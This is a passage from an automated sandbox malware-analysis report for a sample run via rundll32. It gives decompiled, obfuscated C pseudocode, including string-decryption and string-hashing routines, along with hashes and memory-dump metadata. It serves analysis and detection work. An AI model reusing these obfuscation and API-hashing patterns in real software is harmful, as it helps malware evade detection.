0x003586a3
0x003586ae
0x003586bc
0x003586be
0x003586c6
0x003586ce
0x003586d0
0x003586e1
0x003586e6
0x003586e8
0x003586ec
0x003586ec
0x003586ee
0x003586f1
0x003586f3
0x003586fa
0x003586fd
0x00358700
0x00358703
0x00358709
0x0035870a
0x0035870d
0x00358711
0x00358711
0x0035871a
0x0035871a
0x00358726

Strings

&#, xrefs: 00358665

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-2240308938
Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
Instruction ID: 8483a18d6223495181df3451ba61322c9e264a8ba20b562cf97d86768601a1a5
Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
Instruction Fuzzy Hash: F9316B726083518FC305DF28C88581BFBE0FF98718F054B6DE88AA7251D774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0035DCF7 Relevance: 1.3, Strings: 1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0035DCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E003520B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E00347FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}

0x0035dcfd
0x0035dd01
0x0035dd05
0x0035dd07
0x0035dd0c
0x0035dd14
0x0035dd1c
0x0035dd20
0x0035dd28
0x0035dd30
0x0035dd38
0x0035dd40
0x0035dd48
0x0035dd50
0x0035dd58
0x0035dd5c
0x0035dd5f
0x0035dd61
0x0035dd65
0x0035dd69
0x0035dd79
0x0035dd84
0x0035dd93
0x0035dd95
0x0035dd9d
0x0035dda5
0x0035dda7
0x0035ddb8
0x0035ddbd
0x0035ddbf
0x0035ddc3
0x0035ddc3
0x0035ddc5
0x0035ddc8
0x0035ddcd
0x0035ddd5
0x0035dddb
0x0035dddf
0x0035dde8
0x0035dde9
0x0035ddf0
0x0035ddf4
0x0035ddf8
0x0035ddf8
0x0035de03
0x0035de03
0x0035de0f

Strings

g|E, xrefs: 0035DD48

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: g|E
API String ID: 0-3824901942
Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
Instruction ID: 0e8ce82bab477cf319bb27d7d4b123f1497294089bb531b23155791bd5852524
Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
Instruction Fuzzy Hash: FE3181766183118FC714DF19C48585BF7E0FF88318F424B6EE889AB251D774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 003451BB Relevance: 1.3, Strings: 1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003451BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x363e04 = E00347FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x363e04; // 0x0
					E00350001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}

0x003451c1
0x003451c7
0x003451ce
0x003451d5
0x003451e2
0x003451ea
0x003451f1
0x003451f3
0x00345202
0x00345207
0x0034520c
0x00345213
0x0034521a
0x0034521e
0x00345225
0x0034522c
0x00345233
0x0034523a
0x0034523f
0x00345244
0x0034524b
0x00345252
0x0034525c
0x00345264
0x00345267
0x0034526e
0x00345275
0x00345275
0x0034527b
0x0034528b
0x0034528c
0x00345294
0x00345299
0x00000000
0x00345299
0x00000000
0x0034527b
0x003452a0
0x003452ac
0x003452b2
0x003452b4
0x003452b4
0x003452c1

Strings

f(j4, xrefs: 00345225

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: f(j4
API String ID: 0-3086030595
Opcode ID: 20fca4ab064ead5bb84f69a86c3a05f2b5ef7975f36f57b5f2950672aaa9536c
Instruction ID: dd692576c8bd0ae9da464a98d0ad14db1c1407f901c6e8569334d40e4bf88ce7
Opcode Fuzzy Hash: 20fca4ab064ead5bb84f69a86c3a05f2b5ef7975f36f57b5f2950672aaa9536c
Instruction Fuzzy Hash: 02314771E01219ABCF09DFAAD9855EEBBF1FB44324F20849AE505AB250D3B45F45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00342051 Relevance: 1.3, Strings: 1, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00342051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E003520B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}

0x00342056
0x0034205a
0x0034205e
0x00342061
0x00342066
0x00342070
0x0034207b
0x00342081
0x00342085
0x0034208d
0x00342095
0x0034209d
0x003420a5
0x003420b3
0x003420b6
0x003420ba
0x003420bf
0x003420c7
0x003420cf
0x003420d7
0x003420dc
0x003420e4
0x003420e9
0x003420f4
0x003420fc
0x003420fc
0x00342102
0x00342110
0x00342114
0x00342119
0x00342121
0x00342131
0x00342139
0x0034213e
0x00342146
0x0034214b
0x00342153
0x0034215d
0x00342160
0x00342165
0x0034216c
0x0034216c
0x0034216f
0x00342173
0x00342176
0x0034217a
0x0034217e
0x00342184
0x00342185
0x0034218f
0x00342199

Strings

QC, xrefs: 0034208D

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: QC
API String ID: 0-229404352
Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
Instruction ID: b950ed366f2d0ddd47d0e4b3a8205277b97ac67b34da1795777411fb124ce84b
Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
Instruction Fuzzy Hash: 753115719083818BD315DF29C48905BBBE0FFC87A8F558E1DF4C9A6225D3B4D688CB56

Uniqueness

Uniqueness Score: -1.00%

Function 003609B5 Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003609B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E003494EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}

0x003609bb
0x003609bf
0x003609c6
0x003609cd
0x003609d4
0x003609db
0x003609e2
0x003609e9
0x003609f0
0x003609f7
0x003609fe
0x00360a09
0x00360a12
0x00360a17
0x00360a1e
0x00360a25
0x00360a2f
0x00360a32
0x00360a35
0x00360a3c
0x00360a43
0x00360a4a
0x00360a55
0x00360a5b
0x00360a62
0x00360a69
0x00360a70
0x00360a77
0x00360a7b
0x00360a82
0x00360a89
0x00360a90
0x00360ab3
0x00360abd
0x00360ac7

Strings

6Rr, xrefs: 003609F0

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6Rr
API String ID: 0-3911282678
Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
Instruction ID: ddd1e683da0e0552fec38506c2558859aed549d045daed7ee263496dcc97a780
Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
Instruction Fuzzy Hash: 3631E0B1D1021EEBDB04CFA6C94A9EEFBB5FB44318F108599D121B6250D3B85B49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00358519 Relevance: 1.3, Strings: 1, Instructions: 49
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00358519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E003520B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E0034A30C(_v12, _a4, E00341DB9(__ecx), _v20);
			}

0x0035851f
0x00358523
0x00358524
0x00358529
0x00358530
0x00358537
0x0035853e
0x00358545
0x0035854c
0x00358553
0x0035855a
0x00358561
0x0035856c
0x0035856f
0x00358576
0x0035857d
0x00358584
0x0035858b
0x00358592
0x00358599
0x0035859c
0x003585a3
0x003585aa
0x003585b1
0x003585b8
0x003585bf
0x003585c6
0x003585cd
0x003585d4
0x003585db
0x00358605

Strings

8, xrefs: 00358561

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8
API String ID: 0-719543824
Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
Instruction ID: cca965165f10136c68d2e962c6403abb831d34639e9e08d3209d823b1cebdc0a
Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
Instruction Fuzzy Hash: 9E21D4B5C00208EBCF49DFE1CA8689EBFB5FF00304F608189E411BA261D3B54B54DB95

Uniqueness

Uniqueness Score: -1.00%

Function 100323E2 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0

Uniqueness

Uniqueness Score: -1.00%

Function 10031FC2 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0

Uniqueness

Uniqueness Score: -1.00%

Function 10031BB6 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0

Uniqueness

Uniqueness Score: -1.00%

Function 100317E2 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0

Uniqueness

Uniqueness Score: -1.00%

Function 00344346 Relevance: .2, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00344346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E0034AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E0034AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E00347FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}

0x0034434d
0x00344351
0x00344353
0x00344357
0x00344358
0x00344359
0x0034435e
0x00344366
0x0034436b
0x0034436d
0x00344371
0x00344376
0x00344384
0x00344389
0x0034438f
0x00344397
0x0034439f
0x003443a4
0x003443ac
0x003443b8
0x003443bd
0x003443c3
0x003443c8
0x003443d0
0x003443d8
0x003443e5
0x003443e8
0x003443ec
0x003443f4
0x003443fc
0x0034440c
0x00344410
0x00344418
0x00344420
0x00344428
0x00344430
0x0034443c
0x00344441
0x00344447
0x0034444f
0x00344457
0x0034445f
0x00344467
0x0034446f
0x00344477
0x0034447f
0x00344487
0x0034448f
0x00344497
0x0034449f
0x003444a7
0x003444ac
0x003444b4
0x003444c0
0x003444c3
0x003444c7
0x003444cc
0x003444d9
0x003444e6
0x003444ee
0x003444f6
0x003444fe
0x0034450b
0x0034450f
0x00344517
0x0034451f
0x00344527
0x0034452f
0x00344534
0x0034453c
0x00344544
0x0034454c
0x00344554
0x0034455c
0x0034455c
0x00344566
0x003445bd
0x003445e3
0x003445e8
0x003445ed
0x003445ef
0x00000000
0x003445ef
0x00344568
0x0034456e
0x003445b9
0x00000000
0x00344570
0x00344576
0x00000000
0x0034457c
0x0034457c
0x003445a1
0x003445ad
0x003445ad
0x00344576
0x0034456e
0x003445b0
0x003445b8
0x003445b8
